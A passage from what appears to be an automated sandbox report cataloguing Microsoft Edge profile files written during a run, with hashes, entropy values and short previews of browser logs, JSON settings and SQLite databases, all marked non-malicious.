                                                                                                                                                                                                                                                                                                  SHA-256:AC738EBE6935E6520986314CCAA74C7CDD2DF54C54291D7DEDCBEA3D488B1191
                                                                                                                                                                                                                                                                                                  SHA-512:F71DB20EAB364CC4C2919E09582CC5631A89A66F2EDCF7F9FC489493C68671F4CF55D8DF521CF88D5E5CA11A66F93838934CD797F023FA3EDFC3A8B22EEE27BD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.323 4cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-01:01:22.324 4cc Recovering log #3.2024/12/27-01:01:22.326 4cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6480765067883114
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:aj9P0tcAjl+QkQerDP/Kbt+773pL9hCgam6ItRKToaAu:adTKl+e2DP/P7Pv9RKcC
                                                                                                                                                                                                                                                                                                  MD5:206D5391A36486D9E39C96DC9C6995AB
                                                                                                                                                                                                                                                                                                  SHA1:0D3ECF912D29427827B87521F9010AF7E2D84EF0
                                                                                                                                                                                                                                                                                                  SHA-256:CE70C08E22AFBECDF3D344FCC276BEDA4A4CA9B8C1EAF8DCA15CB663943F7B6F
                                                                                                                                                                                                                                                                                                  SHA-512:26AE30E175400A8921499A5B76D4A402B8CBC014BE48BE68D79230380C579657C3FBFC2A550ECF391EAC64672FF83FEB577FA30C5F33DF1C256B5A271F71EDF1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):408
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.256829450949075
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:BiFxv4Yeb8rcHEZrELFUt8UG/+U65LYeb8rcHEZrEZSJ:84Yeb8nZrExg8yLYeb8nZrEZe
                                                                                                                                                                                                                                                                                                  MD5:F04CAFD51C2D563458527CED08264EB7
                                                                                                                                                                                                                                                                                                  SHA1:7CD7C977689AA5C9FE167196EB00814C7384B64B
                                                                                                                                                                                                                                                                                                  SHA-256:999948F9E865ED16E809814F5668BBA929F326A63F5B945BD19E1CBD329B7105
                                                                                                                                                                                                                                                                                                  SHA-512:BB4AC006AC03032DD5AB47C2F2CA8571C43FB3A983DA0810F734683017CFF1E797102F9D03450F941951ACF17D10F9E35BF1E229735B457BA3CBA19738F5ACDD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:25.476 1574 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-01:01:25.477 1574 Recovering log #3.2024/12/27-01:01:25.477 1574 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):408
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.256829450949075
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:BiFxv4Yeb8rcHEZrELFUt8UG/+U65LYeb8rcHEZrEZSJ:84Yeb8nZrExg8yLYeb8nZrEZe
                                                                                                                                                                                                                                                                                                  MD5:F04CAFD51C2D563458527CED08264EB7
                                                                                                                                                                                                                                                                                                  SHA1:7CD7C977689AA5C9FE167196EB00814C7384B64B
                                                                                                                                                                                                                                                                                                  SHA-256:999948F9E865ED16E809814F5668BBA929F326A63F5B945BD19E1CBD329B7105
                                                                                                                                                                                                                                                                                                  SHA-512:BB4AC006AC03032DD5AB47C2F2CA8571C43FB3A983DA0810F734683017CFF1E797102F9D03450F941951ACF17D10F9E35BF1E229735B457BA3CBA19738F5ACDD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:25.476 1574 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-01:01:25.477 1574 Recovering log #3.2024/12/27-01:01:25.477 1574 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1039
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.59605785651415
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:DZWul4OaOTeSfJrXZMWpV03y1x4ghaji0MyG:DZz3aO1rXZbpV03Sx4kajWyG
                                                                                                                                                                                                                                                                                                  MD5:BD0CD5C23997AC0F985557A169B68B3A
                                                                                                                                                                                                                                                                                                  SHA1:B2E8052722D73617961290514F90AF1B4072C2AC
                                                                                                                                                                                                                                                                                                  SHA-256:AE72AD53FE47AED2B2FC27A04FA89DEE70F0F6A6E676C9CF71BA97CE51CFD98E
                                                                                                                                                                                                                                                                                                  SHA-512:3FD35A6B230C23EAD3EB7089DAE19ECFAEDAB7E628AC6D43598BD40005E974D6C7AD1099FDB93857638B3887348B57C6C1C206FFA3E345ECDAD01409CCE1150D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.sD..................VERSION.1..META:https://ntp.msn.com............!_https://ntp.msn.com..LastKnownPV..1735279296236.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735279297430.._https://ntp.msn.com..MUID!.3918B198F66063F3328CA4FAF7676296.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735279296326,"schedule":[-1,4,9,-1,-1,-1,40],"scheduleFixed":[-1,4,9,-1,-1,-1,40],"simpleSchedule":[23,22,10,31,32,34,48]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735279296205.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Fri Dec 27 2024 01:01:35 GMT-0500 (Eastern Standard T

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.109217395386144
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XnAVq2P923oH+Tcwt8a2jMGIFUt8U4XHNAgZmw+U4XxAIkwO923oH+Tcwt8a23:BNv4Yeb8EFUt8UqX/+UC5LYeb8bJ
                                                                                                                                                                                                                                                                                                  MD5:39B8708445FC909B23ED9718FFF73D6A
                                                                                                                                                                                                                                                                                                  SHA1:0FDC142B5C7693892AF2405E215483FD2C1533CB
                                                                                                                                                                                                                                                                                                  SHA-256:17071D358DF799887BD92130590EA4A4DB7A7EF82AECF68DC5BAD868A01463A8
                                                                                                                                                                                                                                                                                                  SHA-512:4E98E1943B0C0D1258091962552B9D6270928D6998C0B8D2C9CDA02093B9739145D8516921309EBAF162CB673531B827872D531876EA7EC7339B77F2854B31CD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.560 14d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:01:22.562 14d0 Recovering log #3.2024/12/27-01:01:22.566 14d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.109217395386144
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XnAVq2P923oH+Tcwt8a2jMGIFUt8U4XHNAgZmw+U4XxAIkwO923oH+Tcwt8a23:BNv4Yeb8EFUt8UqX/+UC5LYeb8bJ
                                                                                                                                                                                                                                                                                                  MD5:39B8708445FC909B23ED9718FFF73D6A
                                                                                                                                                                                                                                                                                                  SHA1:0FDC142B5C7693892AF2405E215483FD2C1533CB
                                                                                                                                                                                                                                                                                                  SHA-256:17071D358DF799887BD92130590EA4A4DB7A7EF82AECF68DC5BAD868A01463A8
                                                                                                                                                                                                                                                                                                  SHA-512:4E98E1943B0C0D1258091962552B9D6270928D6998C0B8D2C9CDA02093B9739145D8516921309EBAF162CB673531B827872D531876EA7EC7339B77F2854B31CD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.560 14d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:01:22.562 14d0 Recovering log #3.2024/12/27-01:01:22.566 14d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\80321a16-70d8-4e4d-91b2-15a542c841aa.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\9d2d8d62-8bff-4dbf-aa24-1b3ee905d386.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7866249405793737
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:tTnrqKaBn3sx9GOAvR2nTBJXcf0L/ZJVb:Vnrq5h3sTGOAoXI0LhJVb
                                                                                                                                                                                                                                                                                                  MD5:C6001E8500F35156AAE0375203C3BEC8
                                                                                                                                                                                                                                                                                                  SHA1:75B95CC8A12A6BD5F9F45B7FF00873A6FD75EA4F
                                                                                                                                                                                                                                                                                                  SHA-256:5B0518B52CC024186C2A6F6D8D156FD4BCCFD639B0022CF53A9456F647A4AB92
                                                                                                                                                                                                                                                                                                  SHA-512:61A4D8628867F414CF01B205091969C4BC8B470ED24F4D65DED563E595FBD239AAF9CDB739FADC5C03C72E540A38699E61EB72DAB1881146B7AAC6733BEE1080
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1419
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                                  MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                                  SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                                  SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                                  SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2146087032542026
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBRWN:eIEumQv8m1ccnvS6dq+6bL3v
                                                                                                                                                                                                                                                                                                  MD5:F8B43DBC77B3194A57600E863AE10798
                                                                                                                                                                                                                                                                                                  SHA1:C1841CE427481827F74E3D4031F5A796B5A86CEA
                                                                                                                                                                                                                                                                                                  SHA-256:4C02829C23905AB505E8C435B296922EF4E644A47D5353A2D495146F682C463D
                                                                                                                                                                                                                                                                                                  SHA-512:BAB881EC9EC4645BE7668B374D79C08A3C2016129382C7AEBEF0E02BC1F9A1724314D194EAB72F63692A1A211E2AD5F9FE9F95BA2E1AA4182680CF50475FB1B3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF47125.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF48ac7.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
